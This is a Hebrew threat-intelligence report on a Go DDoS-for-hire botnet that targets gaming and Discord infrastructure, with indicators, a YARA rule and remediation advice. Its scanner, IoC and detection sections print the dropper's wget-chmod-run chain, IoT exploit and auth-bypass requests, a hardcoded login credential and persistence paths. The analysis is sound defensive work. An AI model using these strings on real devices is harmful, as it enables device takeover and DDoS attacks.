malware · botnet · ddos · golang · iot · honeypot · gaming · mirai
בתוך מבצע DDoS-להשכרה בתחום הגיימינג
Kinryū Labs מעריכה בביטחון גבוה שמדובר במבצע DDoS-להשכרה מסחרי המכוון לתחום הגיימינג ורץ על ערכת בונה (builder) בוטנטים משותפת. אותו בסיס-קוד Go מהודר על ידי מפעילים שונים עם שרתי C2 ומערכי-התקפה משלהם; הצי שנותח כאן מעמיד בחזית API להשכרה בשירות-עצמי ומוגן-חשבון, ומלאי בוטים חי של כ-28 עד 32 התקנים, המשגר הזמנות התקפה של לקוחות כנגד תשתיות גיימינג וקול. ערוץ הפקודה מבוסס-TCP-גולמי שלו אינו מאומת, ואילו רישום הבוטים מוגן מאחורי ערוץ SSH מאומת-סיסמה.
מאת Davis Zheng·
TLP:CLEAR. אושר לפרסום ציבורי. נלכד על ידי רשת חיישני מלכודות הדבש של Kinryū Labs. המחוונים שלהלן מנוטרלים (defanged).
תקציר מנהלים
- 11קבצים בינאריים ייחודיים על פני 7 ארכיטקטורות
- 28-32בוטים פעילים ב-API להשכרה
- 1גרסה בעלת יכולת SSH (ה-Windows PE)
זהו בוטנט DDoS מבוסס-Go בעל יכולות תולעת IoT, המופץ דרך דרופר רב-ארכיטקטורות (bins.sh) ומופעל כשירות DDoS-להשכרה מסחרי. הבוט מתחבר לשרת הפיקוד-והבקרה שלו על גבי TCP גולמי, שולח פעימות לב STATS תקופתיות, ומקבל פקודות התקפה מופרדות-שורה. Kinryū Labs מעריכה בביטחון גבוה שמדובר בבוטנט DDoS-להשכרה מתפקד וממוקד-גיימינג.
המאפיין הבולט הוא אי-סימטריה באימות. ערוץ הפקודה ב-9111/tcp אינו מאומת: לא סיסמה, לא אסימון, ולא אתגר-מענה עוברים בין חיבור ה-TCP לשיגור הפקודה. רישום הבוטים נעקב בנפרד על גבי ערוץ SSH מאומת-סיסמה ב-911/tcp, ומונה הבוטים של ה-API להשכרה משקף את אותם רישומים מאומתים ולא את חיבורי הפקודה הפתוחים. הקובץ הבינארי שנותח דובר רק את הערוץ מבוסס-TCP-הגולמי ואינו נושא לקוח SSH, כך שהרישום מטופל על ידי רכיב טוען (loader) נפרד.
המבצע מתנהל כעסק גלוי. מארח הפיקוד-והבקרה מעמיד בחזית API של DDoS-להשכרה בשירות-עצמי ומוגן-חשבון, מפרסם ספירה חיה של מלאי הבוטים שלו, והוא אחד מכמה חזיתות-מכירה שנבנו מאותה ערכת בוטנט. במהלך כמה שעות של ניטור, השירות שיגר הזמנות התקפה של לקוחות בזמן אמת.
- ערוץ הפקודה אינו מאומת; הרישום כן. TCP גולמי אל
9111מקבל פקודות ללא כל אימות, בעוד ספירת הבוטים של ה-API להשכרה עוקבת אחר סשני SSH מאומתי-סיסמה ב-911. בדיקה חיה אישרה שחיבור TCP-גולמי אל9111, וכן חילופי מפתחות SSH לא-מאומתים ב-911, שניהם משאירים את ספירת הבוטים ללא שינוי. - הצי הוא בסיס-קוד Go יחיד המהודר בדרכים רבות. שישה-עשר קבצים בשרת הקבצים של ה-C2 מצטמצמים לאחד-עשר קבצים בינאריים ייחודיים על פני שבע ארכיטקטורות, כולם חולקים את נתיב המודול
Botnet/Botואת דגלי הבנייה-tags=netgo -trimpath=true. ה-Windows PE הוא הגרסה היחידה עם לקוח SSH; גרסאות ה-Linux וה-IoT מתפשטות דרך ניצולי הסורק והדרופר. - השירות מכוון לשוק ה-stresser של הגיימינג. מערך השיטות כולל הצפות FiveM, Minecraft, ו-Discord, ופקודות ההתקפה החיות שלכדנו כוונו כמעט כולן אל תשתיות גיימינג וקול.
- המסגרת היא עיצוב משושלת Mirai שנכתב מחדש ב-Go. היא חולקת את התבניות המבניות של Mirai, ערוץ פקודה TCP לא-מאומת, פקודות תחומות-טקסט, שיגור goroutine-לכל-התקפה, וסורק IoT הפוגע באותן מטרות ניצול, מיושמים מחדש ב-Go עם שיטות לשוק הגיימינג, הצפות TLS/HTTPS, ו-API להשכרה שהוצמד לצדם.
- זוהי ערכת בונה משותפת, לא בוטנט בהתאמה אישית. שרת דרופר משני חולק תשתית עם ה-C2 של מפעיל אחר, והציים שנבנו מערכת זו חולקים את נתיב המודול, הסורק, מנגנוני ההיקבעות, וניצולי הנתבים, בעוד הם נבדלים בכתובת ה-C2 ובבחירת שיטות ההתקפה.
ערכת הבוטנט וגרסאותיה
ה-C2 מארח ספריית קבצים פתוחה המגישה את צי הבוטנט. שישה-עשר קבצים מצטמצמים לאחד-עשר קבצים בינאריים ייחודיים לפי SHA-256, המשתרעים על x86, x86-64, ARM (v5/v6/v7), ARM64, ו-MIPS (סדר בתים גדול וקטן), לצד Windows PE ו-stub מינימלי. כולם חולקים את בסיס-הקוד Go של Botnet/Bot, שהודר עם Go 1.26.4, ללא ייבוא צד-שלישי מלבד לקוח ה-SSH של גרסת ה-Windows.
שלוש נקודות בולטות:
- ה-Windows PE הוא הגרסה היחידה בעלת יכולת SSH. רק
bot.exeמייבא אתgolang.org/x/crypto/ssh; סריקת מחרוזות מלאה של גרסת ה-Linuxamd64והשוואה חוצת-קבצים-בינאריים על פני כל אחד-עשר הקבצים הבינאריים הייחודיים לא מצאה ייבוא SSH במקום אחר. גרסאות ה-Linux וה-IoT מתפשטות דרך הסורק והדרופר. - גרסה אחת היא בנייה ישנה יותר, נטולת-C2.
x866הודרה עם Go 1.25.6, אל מול 1.26.4 של הצי, היא גרסת ה-ELF הקטנה ביותר, ואינה נושאת כתובת C2 גלויה; הכתובת ככל הנראה מקודדת או מסופקת בזמן ריצה. היא חולקת את בסיס-הקודBotnet/Bot, מה שקושר אותה לאותו מפעיל. sora.x86אינו בוטנט. על אף שם קובץ המזכיר את משפחת ה-”Sora” של Mirai, זהו stub מינימלי של Go שנבנה על ידי אותה שרשרת-כלים, שכל קוד המשתמש שלו מדפיסsora.x86 is runningויוצא, ללא כתובת C2, סורק, שיטות התקפה, או אישורים. סביר להניח שהוא משמש כזקיף-תהליך (process sentinel) או כפיתיון בשרת הקבצים.
שלוש לכידות של ה-Windows PE משתרעות על פני כשבוע: שתיים זהות בית-בבית, מאוחרת יותר היא בנייה-מחדש מקוצצת וקטנה יותר, ומאוחרת עוד יותר היא הידור-מחדש מלא-תכונות הנבדל מהמקור.
פרוטוקול ה-C2
ערוץ הפקודה הוא TCP גולמי ללא אימות תעבורה. רצף החיבור הוא אחזור תצורה אופציונלי (GET /config.dat, מאומת אל מול checkcode מוטמע), שגרת היקבעות, ולאחר מכן net.Dial אל יציאת הפקודה, שלאחריו הבוט קורא פקודות מבלי לכתוב דבר תחילה.
- פעימת לב:
STATS|%d|%d|%d|%d|%s\n. השדה הסופי הוא מערכת ההפעלה או הארכיטקטורה (למשלamd64); ארבעת המספרים השלמים מדווחים על ספירות התקפה, חיבור, סריקה, והדבקה. - פקודות: מופרדות-שורה-חדשה ומפוצלות-רווח, בצורה
ATTACK_TYPE TARGET PORT DURATION [OPTIONS...]. השדה הראשון בוחר את השיטה והשדות המספריים מנותחים באמצעותstrconv.Atoi. - התחברות מחדש: טיימר של 120 שניות חוזר ונכנס ללולאת החיבור.
- תצורה: אישורים ותצורה נמשכים מ-
config.datומפוענחים באמצעות צופן XOR רב-שלבי מותאם-אישית (חוצץ בגודל 4,078 בתים המאותחל ברווחים, ולאחר מכן XOR ברמת-בית עם שני בתי מפתח קבועים,0x24ו-0x3C). בעת הניתוחconfig.datלא הוגש, מה שמצביע על כך שהמפעיל השבית או העביר אותו.
שיטות התקפה
הבוט מגיע עם ערכת כלי DDoS רחבה, שקוטלגה משמות הפונקציות שלו וממחרוזות היומן:
שיטות התקפה
ממוקדות-גיימינג: FiveMFlood, FiveMBypass, FiveMTCP, Minecraft, Discord.
שכבה 7: HTTPSFlood (Starting Optimized HTTPS Flood on), Bypass, TLSFlood, TLSPlusFlood, TLSPlusBypassFlood, Priv7Flood (PRIV7 Attack finished).
שכבה 4: TCPFlood, PPSFlood, PPSRawFlood, RawTCPFlood, RawACKFlood, ResetAttack.
שכבה 3: UdpFlood, RawUDPFlood, UDPPPSFlood (Extreme UDP (PPS)), GbpsFlood (High GBPS), DNSFlood.
מיוחדות / ספציפיות-לאירוח: OVHFlood (מכוונת ל-OVH), GameFlood, FortAttack (Fortnite), Crash, Freez.
Linux-בלבד (לא בבנייה של ה-PE): NtpAmp (הגברת NTP מלאה; ה-PE מגיע עם stub), HandshakeFlood (הצפת TCP SYN מבוססת socket גולמי עם זיוף IP), VoultFlood (הצפה מבוססת socket גולמי עם חישוב סכום-ביקורת).
הצפות ה-HTTP מסובבות שתים-עשרה מחרוזות User-Agent של דפדפנים המקודדות-קשיח וקובעות Referer מתוך מערך אתרים בעלי-מוניטין-גבוה (google.com, twitter.com, facebook.com, fbi.gov, reddit.com, bing.com) כדי להתמזג עם תעבורה לגיטימית ולחמוק מסינון WAF.
סורק ותולעת IoT
הסורק מבצע פריצה-בכוח (brute-force) של אישורי התחברות ל-IoT ומנצל כמה מחסניות-אינטרנט של התקנים מוטמעים: מצלמות DVR/IP מסוג JAWS (GET /syscmd.htm), שרת האינטרנט Boa בנתבים (POST /boafrm/formSysCmd, POST /boafrm/formLogin), והתקנים מבוססי GoAhead (setUserLogin לעקיפת אימות ויצירת משתמש-מנהל, getSanvas לחילוץ תצורה). התקנים שנפרצו מוכוונים להריץ wget %s -O bins.sh; chmod +x bins.sh; ./bins.sh.
האישורים מפוצלים. סיסמת סורק אחת מקודדת-קשיח בקובץ הבינארי (555111111!!, עם שם משתמש סביר 555), בעוד רשימת האישורים הנרחבת נמשכת מ-config.dat בזמן ריצה ומפוענחת ב-XOR.
ההיקבעות משתמשת בארבעה מנגנונים ובנוסף הסוואת-תהליך: יחידת systemd ב-/etc/systemd/system/sysd.service (עם daemon-reload), רשומת cron דרך /tmp/cron_tmp, rc.local (/etc/rc.local, /etc/rc.d/rc.local), ו-init.d (/etc/init.d/boot.local). התהליך מתחזה לדמון מערכת בשם sysd.
מבצע ההשכרה
מארח הפיקוד-והבקרה מסודר כמו עסק. הוא חושף SSH של מפעיל ב-22, ערוץ רישום-בוטים Go SSH ב-911 (אימות סיסמה, על מפתח RSA-2048 נבדל), API HTTP של DDoS-להשכרה ב-3333, ערוץ הפקודה מבוסס-TCP-גולמי ב-9111, ושרת קבצים בספרייה-פתוחה ב-5001 המארח את צי הבוטים להורדה.
חזית-מכירה בשירות-עצמי. ה-API ב-3333 הוא booter מינימלי בעל נקודת-קצה יחידה. /stats מחזיר ספירה חיה של מלאי הבוטים; /api מקבל הזמנה. הוא מאמת user ו-psw, אישורי חשבון פר-לקוח, לצד host, method, time/duration, ו-port, פרמטרי המטרה וההתקפה, ודוחה כל דבר חסר או לא-מאומת. טופס ההזמנה גלוי מגישושים לא-מאומתים:
GET /stats
{"time":<unix>,"total":30}
GET /api
Missing parameters: user, psw, host, method, time/duration, port
GET /api?user=…&psw=…&host=…&method=…&time=…&port=…
Authentication failed
טופס ההזמנה ממופה אחד-לאחד על פורמט הפקודה של הבוט (ATTACK_TYPE TARGET PORT DURATION): בקשת API מאומתת אחת הופכת לשורה יחידה המשוגרת על גבי הערוץ הלא-מאומת 9111 אל כל בוט רשום.
מלאי מטופח. /stats דיווח על 28 עד 32 בוטים פעילים עם תחלופה מתמדת לאורך חלון הניטור. מכיוון שאותו מונה עוקב אחר הרישומים מאומתי-הסיסמה ב-911 ולא אחר חיבורי הפקודה הגולמיים, זוהי ספירת מלאי מבוקרת. זו הסיבה התפעולית לכך שהרישום ושיגור הפקודה מפוצלים על פני שני ערוצים: שער אחד להחליט אילו בוטים שייכים לשירות, וערוץ פתוח אחד להניע אותם.
מעבר מכרייה ל-DDoS. שרת הדרופר המשני נושא miner.sh ריק לצד צי ה-DDoS, שריד של רכיב כורה-מטבעות שהוסר מאז. נראה שהמפעיל עבר מכריית-מטבעות למכירת DDoS.
מימוש הזמנות, נצפה בזמן אמת
אימתנו את הפרוטוקול שהונדס-לאחור אל מול ה-C2 החי באמצעות מנטר פסיבי וצפינו בשירות פועל. ה-C2 היה ברובו בטל; במהלך מפגש יחיד בן כמה שעות הוא שיגר שלוש-עשרה פקודות התקפה, כל אחת הזמנת לקוח שנדחפה אל הצי.
ההזמנות כוונו כמעט כולן אל תשתיות גיימינג וקול: בעיקר שרתי משחק FiveM (GTA V) על Google Cloud בערב הסעודית, עם נקודות-קצה קוליות של Discord על Cloudflare וזוג שרתי אינטרנט. אנו מעריכים שזהו שירות stresser ממוקד-גיימינג הפועל על רקע סכסוך לקוחות ספציפי. תבנית השיגור נקראת כמו אספקת שירות: משכי התקפה מדורגים הדומים לרמות מוצר (גישושים בני 20 שניות, סטנדרט בן 30 שניות, מתמשך בן 60 שניות), הסלמת שיטות (הצפה גנרית לבדיקת מטרה, ולאחריה שיטה ספציפית-לפרוטוקול כנגדה), שיגור מזווג ומתפרץ שאחריו שקט, ו”הקשה-כפולה” על שתי כתובות ה-IP שמאחורי הקול מאוזן-העומס של שרת Discord.
ערכת בונה משותפת
זהו אינו בוטנט בהתאמה אישית. זוהי בנייה אחת של ערכת בוטנט שמפעילים שונים מתאימים ומריצים כשירות משלהם. המבט הברור ביותר על הערכה הוא השוואה זו-לצד-זו עם הצי בדוח הקודם שלנו, בוטנט DDoS-להשכרה חוצה-פלטפורמות בשפת Go, הרץ על אותו בסיס-קוד:
| הדוח הקודם | המבצע הזה | |
|---|---|---|
| בסיס-קוד | ערכת Go Botnet/Bot | אותה ערכת Go Botnet/Bot |
| מסירה | Jenkins RCE + סורק IoT | Jenkins RCE + סורק IoT |
| סורק, היקבעות, ניצולי נתבים | משותפים | משותפים |
| כתובת C2 | 185.226.93[.]242 | 5.175.140[.]178 |
| מערך-כלים ושוק | DDoS כללי | stresser גיימינג (FiveM, Minecraft, Discord) |
הציים חולקים את נתיב המודול Botnet/Bot, את אותו סורק וניצולי IoT, את אותם מנגנוני היקבעות, ואת אותו דרופר, והם רצים על תשתית חופפת: שרת הדרופר המשני כאן (185.226.93[.]242) הוא ה-C2 של הדוח הקודם. מה שנבדל הוא מערך-הכלים והשוק. אותו צי אחר מהדר מערך הצפות כללי; המפעיל כאן מהדר שיטות גיימינג ומספק את ה-API להזמנות-להשכרה, המכוון היישר אל שוק ה-stresser של הגיימינג. יחד הם מצביעים על כלכלת ערכות-בנייה: בסיס-קוד משותף, נמכר-מחדש או מועבר מיד ליד, כל מפעיל מקים חזית-מכירה עם מטרות משלו.
סימני פריצה
תשתית התוקף מנוטרלת. הטביעות משוחזרות במדויק.
רשת
| מחוון | הקשר |
|---|---|
5.175.140[.]178:911/tcp | רישום בוטים (Go SSH, אימות סיסמה; נספר על ידי ה-API להשכרה) |
5.175.140[.]178:9111/tcp | שיגור פקודות (TCP גולמי, לא-מאומת; אינו נספר) |
5.175.140[.]178:3333/tcp | API של DDoS-להשכרה (/stats, /api) |
5.175.140[.]178:5001/tcp | שרת קבצים בספרייה-פתוחה (צי הבוטים + דרופר) |
5.175.140[.]178:22/tcp | SSH של מפעיל (OpenSSH 9.7p1 Ubuntu) |
hxxp://5.175.140[.]178:9111/config.dat | אחזור תצורה על גבי TCP גולמי |
hxxp://5.175.140[.]178:5001/bins.sh | דרופר רב-ארכיטקטורות (ראשי) |
185.226.93[.]242:1001/tcp | דרופר משני (C2 של מפעיל נפרד) |
hxxp://185.226.93[.]242:1001/bins.sh, …/binns.sh | דרופר (משני + גרסת שגיאת-הקלדה) |
217.60.195[.]229 | כתובת מקור שמסרה את הדגימה |
5.175.140[.]0/24 | הקצאת אירוח |
מחרוזות סורק / התפשטות
GET /syscmd.htm HTTP/1.1 (JAWS DVR/IP camera RCE)
POST /boafrm/formSysCmd HTTP/1.1 (Boa router RCE)
POST /boafrm/formLogin HTTP/1.1 (Boa login)
GET /login.htm HTTP/1.1 (router login page)
{"topicurl":"setting/setUserLogin",...} (GoAhead auth bypass / admin-user creation)
{"topicurl":"setting/getSanvas"} (GoAhead config extraction)
GET /config.dat HTTP/1.1 (remote config fetch)
wget %s -O bins.sh; chmod +x bins.sh; ./bins.sh
proxy/tlsplusbypass.txt
פריטי מארח
Process name: sysd
systemd: /etc/systemd/system/sysd.service (+ daemon-reload)
cron: /tmp/cron_tmp
rc.local: /etc/rc.local, /etc/rc.d/rc.local
init.d: /etc/init.d/boot.local
Hardcoded scanner credential: 555111111!! (likely username 555)
קבצים (SHA-256), Go 1.26.4 אלא אם צוין אחרת
טביעות הקבצים המלאות
bot.exe (Windows PE, only SSH-capable variant), captures:
6da756970a411dade9db3c921ef4cdade550f317703d0fc12090a15d8c6778d4 (6,253,056 bytes)
36f1b06c942271496d8a9e26bde8d5ddacea82965ea3232ea99804170c1e4e25 (4,933,632 bytes, stripped rebuild)
4de4621f66780e1400bf3c55f146f84f6d77bbdd3a401451f3b7f16d674e3804 (6,020,608 bytes, full rebuild)
Linux amd64: 8ddad5973d0ed85ba2babe36121d16fa9307b8804206f645630b10f772010680
Linux i386/x86 (byte-identical): d862b2589aef9611807dfe1f27c4544120dd76f029afc006038ad5b81d57086e
Linux ARM (android_arm = arm = arm7 = armv7l): 523c4096458bc3ac42e2bc92a8cf5a36b7bab1c75a2cc0e1ab3f9e5db3c33c82
Linux ARM5: 362c5394a0fa1e87929da5967ec779dcf8c7bbcbdd9417391349e9aa6c2cc4b3
Linux ARM6: 2709ce2627b6aed42166bc7cdf14f9b22855ee7a99f9eb76febb1ec9c8d22b41
Linux ARM64 (android_arm64 = arm64): 428de403a62e4e8ebc2e54af94d36e43e6b26d5e41bbc0d81b39c3e19f4b1d2a
Linux MIPS (BE): 6500fef3003e5d2d7ef6fbdbe6219e93f31082c232ce2769f206d1f425c75f21
Linux MIPS (LE): 3e02755cd326c9c724abc730a40ae0cccebfa23614fbbd566a08b71a1f5f2fdc
x866 (Go 1.25.6, no visible C2 IP): f223bc55bad1bf9ba6ae9ba11f58b338bc00e8e0d4b50311b5b5c42a09a7c122
sora.x86 (Go stub, not a botnet): a1a9e0a94780a05097544b62eb13db7444b29033fbe1d30a16f2d2334ec424ad
sora.x86 SHA-1: efa32ae20b15f835b96da5ce9e83332b83cbd098
sora.x86 MD5: 3f95cf1ed17f7e00a7be4f5cf12e0088
x86/i386, קבוצת ה-ARM7 (android_arm/arm/arm7/armv7l), ו-android_arm64/arm64 זהים בית-בבית; arm6 נבדל מקבוצת ה-ARM7 על אף אותו גודל (יצירת-קוד GOARM שונה).
אירוח
Provider: Ryzehosting
Maintainer: GHOSTNET-MNT
Abuse: [email protected]
Reverse DNS: static.178.140.175[.]5.clients.ryzehosting.com
IP allocated: 2026-03-15
זיהוי
המחרוזות יציבות ולא-מעורפלות, כך שהחתימות פשוטות. כלל ה-YARA המועמד שלהלן נבנה ממחרוזות ייחודיות; אמת לפני פריסה.
rule go_gaming_ddos_bot_candidate
{
meta:
description = "Candidate: Go DDoS-for-hire botnet (Botnet/Bot codebase, gaming loadout)"
author = "Kinryu Labs honeypot CTI"
reference = "6da75697...78d4" // full SHA-256 in the IOC table
tlp = "CLEAR"
strings:
$mod = "Botnet/Bot" ascii
$cnc1 = "Connecting to CNC" ascii
$cnc2 = "Connected to CNC" ascii
$stats = "STATS|" ascii
$svc = "/etc/systemd/system/sysd.service" ascii
$cron = "/tmp/cron_tmp" ascii
$fivem = "Starting FiveM Flood on" ascii
$cred = "555111111!!" ascii
condition:
($mod and 2 of ($cnc1, $cnc2, $stats)) or
($svc and $cron) or
(2 of ($fivem, $cred, $stats))
}
לוגיקת זיהוי נוספת:
# STATS heartbeat on egress (regex)
STATS\|[0-9]+\|[0-9]+\|[0-9]+\|[0-9]+\|.+\n
# IoT exploit payloads (inbound)
GET /syscmd.htm HTTP/1.1
{"topicurl":"setting/setUserLogin","username":"...
{"topicurl":"setting/getSanvas"}
# Dropper execution chain
wget %s -O bins.sh; chmod +x bins.sh; ./bins.sh
תיקון
- אל תחשוף את Jenkins, או ממשקי CI/CD וניהול אחרים, לאינטרנט. זה היה וקטור המסירה.
- עדכן או פַלֵּח התקני IoT מבוססי JAWS, Boa, ו-GoAhead, וחסום גישה חיצונית לממשקי הניהול שלהם. אלה מטרות ההתפשטות של הסורק.
- חסום את תשתית ה-C2 והדרופר בפרימטר (
5.175.140[.]178והדרופר185.226.93[.]242:1001), והתרע על אחזור ה-config.datועל שרשרת ההרצה שלbins.sh. - התרע על פריטי ההיקבעות ועל שם התהליך
sysd, ועל תבנית פעימת הלבSTATS|בתעבורה יוצאת.
מיפוי MITRE ATT&CK
| טקטיקה | טכניקה |
|---|---|
| Initial Access | T1190 Exploit Public-Facing Application (מסירת Jenkins; ניצולי מחסנית-אינטרנט IoT של JAWS / Boa / GoAhead) |
| Execution | T1059.004 Command and Scripting Interpreter: Unix Shell (דרופר bins.sh) |
| Persistence | T1543.002 Systemd Service (sysd.service); T1053.003 Cron; T1037.004 RC Scripts (rc.local); סקריפט אתחול init.d |
| Defense Evasion | T1036 Masquerading (שם תהליך sysd; זיוף User-Agent של דפדפן ו-referer); T1027 Obfuscated Files or Information (config.dat מקודד-XOR) |
| Credential Access | T1110 Brute Force (התחברות להתקן IoT) |
| Discovery | T1046 Network Service Scanning (סורק IoT) |
| Command and Control | T1071.001 Web Protocols (config.dat); T1571 Non-Standard Port (911, 9111, 3333, 5001); T1105 Ingress Tool Transfer (דרופר רב-ארכיטקטורות) |
| Impact | T1498.001 Direct Network Flood (UDP / TCP / PPS / FiveM / Discord); T1498.002 Reflection Amplification (DNS / NTP) |
מתודולוגיה והערות
- הניתוח הוא הנדסה-לאחור סטטית בתוספת אימות פרוטוקול-חי פסיבי; הקבצים הבינאריים מעולם לא הורצו.
- המחוונים מנוטרלים והטביעות משוחזרות במדויק.
- דגימות זמינות לחוקרים ולמגנים אחרים לפי בקשה. כתבו ל-[email protected] עם פתק קצר על מי אתם ולמה אתם זקוקים להן.